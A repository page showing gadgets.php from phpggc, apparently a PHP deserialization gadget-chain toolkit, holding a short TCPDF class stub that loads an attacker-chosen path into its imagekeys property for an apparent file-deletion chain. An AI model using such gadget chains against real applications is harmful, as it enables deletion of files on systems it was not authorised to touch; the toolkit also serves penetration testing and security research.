Codebase list phpggc / ef5d22d gadgetchains / TCPDF / FD / 1 / gadgets.php
ef5d22d

Tree @ef5d22d (Download .tar.gz)

gadgets.php @ef5d22draw · history · blame

<?php

class TCPDF {
    protected $imagekeys;
    
    function __construct($remote_path) {
		$this->imagekeys = [
		    $remote_path
        ];
    }
}